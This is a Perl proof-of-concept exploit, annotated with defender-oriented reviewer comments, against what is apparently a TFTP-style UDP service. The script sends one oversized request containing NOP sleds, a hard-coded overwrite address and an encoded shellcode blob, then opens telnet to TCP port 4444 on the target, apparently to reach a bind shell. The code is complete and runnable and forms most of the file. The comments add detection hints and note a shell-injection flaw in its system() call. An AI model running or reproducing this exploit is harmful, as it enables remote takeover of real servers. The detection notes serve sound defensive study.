#!/usr/bin/perl -w
# Author: Angel Injection, member of Inj3ct0r Team
# Proof-of-concept for a memory-corruption bug in a UDP service: it sends one
# oversized datagram, then tries to reach TCP port 4444 on the same host.
# The page names neither the affected product, its version, nor a fix; the
# usage string ("Ftpd-innes.pl") and the 0x0001 prefix suggest a TFTP server,
# but that is an inference - confirm against the original advisory.
#
# Reviewer notes for defenders:
#   * Network: a UDP datagram that starts with 00 01 and whose first field is
#     several hundred bytes long, with runs of 0x90 and non-printable bytes,
#     is anomalous for a file-name request and is a reasonable detection hook.
#   * Host: the script expects something to answer on TCP 4444 afterwards, so
#     a new listener on that port owned by the service account is a
#     post-compromise indicator (presumably a bind shell - not decoded here).
#   * The overwrite value is a hard-coded address, so the PoC is tied to one
#     specific build; against other builds a crash of the service is the
#     likely outcome - worth alerting on unexpected service restarts.
#   * No "use strict", so $victim, $exploit and $host are package globals.
use IO::Socket;
# Only $ARGV[1] is tested, so a missing host goes unnoticed as long as a second
# argument exists, and a port of "0" counts as missing. The usage text lists
# three words although only two arguments (host, port) are ever read.
if(!($ARGV[1]))
{
print "Usage: ./Ftpd-innes.pl target host port\n\n";
exit;
}
# UDP socket with a default peer. For UDP no packet is exchanged at this point,
# so success here does not show that the service is reachable. The die message
# mixes English and Italian ("sulla porta" = "on port") and omits $!.
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
# Fixed-size pieces of the request body: three runs of 0x90 bytes (20, 60 and
# 10 bytes) and an 8-byte stub. What the stub does is not established by
# anything on this page.
my $nop0="\x90"x20;
my $asm="\x7c\xc5\x66\x07\x12\x02\x50\xc3";
my $nop1="\x90"x60;
my $nop2="\x90"x10;
# Four-byte value named after the saved instruction pointer; it is a literal
# address, which is what makes the PoC build-specific (see header note).
my $eip="\x42\xfd\x60\x40";
#my $eip="A"x5;
# Opaque encoded payload. Its behaviour is not decoded in this review; the
# only hint on the page is the later connection attempt to TCP 4444.
my $shellcode =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xed".
"\x7d\x09\xbf\x83\xeb\xfc\xe2\xf4\x11\x17\xe2\xf2\x05\x84\xf6\x40".
"\x12\x1d\x82\xd3\xc9\x59\x82\xfa\xd1\xf6\x75\xba\x95\x7c\xe6\x34".
"\xa2\x65\x82\xe0\xcd\x7c\xe2\xf6\x66\x49\x82\xbe\x03\x4c\xc9\x26".
"\x41\xf9\xc9\xcb\xea\xbc\xc3\xb2\xec\xbf\xe2\x4b\xd6\x29\x2d\x97".
"\x98\x98\x82\xe0\xc9\x7c\xe2\xd9\x66\x71\x42\x34\xb2\x61\x08\x54".
"\xee\x51\x82\x36\x81\x59\x15\xde\x2e\x4c\xd2\xdb\x66\x3e\x39\x34".
"\xad\x71\x82\xcf\xf1\xd0\x82\xff\xe5\x23\x61\x31\xa3\x73\xe5\xef".
"\x12\xab\x6f\xec\x8b\x15\x3a\x8d\x85\x0a\x7a\x8d\xb2\x29\xf6\x6f".
"\x85\xb6\xe4\x43\xd6\x2d\xf6\x69\xb2\xf4\xec\xd9\x6c\x90\x01\xbd".
"\xb8\x17\x0b\x40\x3d\x15\xd0\xb6\x18\xd0\x5e\x40\x3b\x2e\x5a\xec".
"\xbe\x2e\x4a\xec\xae\x2e\xf6\x6f\x8b\x15\x18\xe3\x8b\x2e\x80\x5e".
"\x78\x15\xad\xa5\x9d\xba\x5e\x40\x3b\x17\x19\xee\xb8\x82\xd9\xd7".
"\x49\xd0\x27\x56\xba\x82\xdf\xec\xb8\x82\xd9\xd7\x08\x34\x8f\xf6".
"\xba\x82\xdf\xef\xb9\x29\x5c\x40\x3d\xee\x61\x58\x94\xbb\x70\xe8".
"\x12\xab\x5c\x40\x3d\x1b\x63\xdb\x8b\x15\x6a\xd2\x64\x98\x63\xef".
"\xb4\x54\xc5\x36\x0a\x17\x4d\x36\x0f\x4c\xc9\x4c\x47\x83\x4b\x92".
"\x13\x3f\x25\x2c\x60\x07\x31\x14\x46\xd6\x61\xcd\x13\xce\x1f\x40".
"\x98\x39\xf6\x69\xb6\x2a\x5b\xee\xbc\x2c\x63\xbe\xbc\x2c\x5c\xee".
"\x12\xad\x61\x12\x34\x78\xc7\xec\x12\xab\x63\x40\x12\x4a\xf6\x6f".
"\x66\x2a\xf5\x3c\x29\x19\xf6\x69\xbf\x82\xd9\xd7\x1d\xf7\x0d\xe0".
"\xbe\x82\xdf\x40\x3d\x7d\x09\xbf";
# Datagram layout: 00 01 prefix, then the pieces above in a fixed order, then
# NUL + 8 bytes + NUL. The shape resembles a TFTP read request (opcode,
# file-name field, NUL, mode field, NUL) with the file-name field overfilled -
# NOTE(review): inferred from the byte layout, not stated on the page.
$exploit = "\x00\x01" . $nop0 .$asm.$nop1. $shellcode. $nop2 .$eip. "\x00\x7e\x56\x70\x60\x70\x45\x69\x69\x00";
# Single send; the return value of print is not checked, so "sent" and "Done."
# are printed even if the write failed.
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
# NOTE(review): $host is the raw command-line argument interpolated into a
# single-string system() call, so shell metacharacters in it would be
# interpreted by the local shell; the list form system("telnet", $host, 4444)
# avoids that. The exit status of telnet is ignored.
system("telnet $host 4444");
exit;